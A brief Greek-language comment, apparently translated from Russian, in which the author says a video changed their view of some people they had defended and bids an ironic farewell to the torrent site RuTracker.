Υποψιάζομαι ότι τώρα κάποιοι θα αρχίσουν να παρουσιάζουν φλεγμονή του πέμπτου σημείου και θα βρέχονται από απειλές, προσβολές κ.λπ. Αλλά πραγματικά νόμιζα ήδη ότι ήταν μάταιο να επιτεθώ στα παιδιά και δεν έφταιγαν σε τίποτα. Αποδείχθηκε εντελώς διαφορετικό και το βίντεο είναι απόδειξη αυτού. Όπως είπε ένας συνάδελφος: RuTracker - ήσουν σαν αδερφός για μένα.


Κλείσε